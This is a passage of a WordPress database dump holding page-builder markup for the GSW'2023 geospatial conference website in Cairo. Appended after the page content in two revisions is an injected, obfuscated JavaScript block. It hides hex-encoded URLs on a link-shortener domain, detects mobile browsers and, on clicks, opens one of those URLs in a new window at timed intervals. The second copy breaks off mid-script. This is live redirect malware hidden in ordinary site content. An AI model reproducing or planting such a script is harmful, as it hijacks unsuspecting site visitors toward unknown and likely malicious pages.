offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:20:44','2022-11-09 15:20:44','',3066,'https://gsw2023.com/?p=3137',0,'revision','',0),
(3138,1,'2022-11-09 15:23:59','2022-11-09 15:23:59','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_position=\"0% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"2275\"][vc_row_inner][vc_column_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" awb_type=\"image\" awb_image_background_position=\"0% 50%\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\" awb_image=\"2275\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 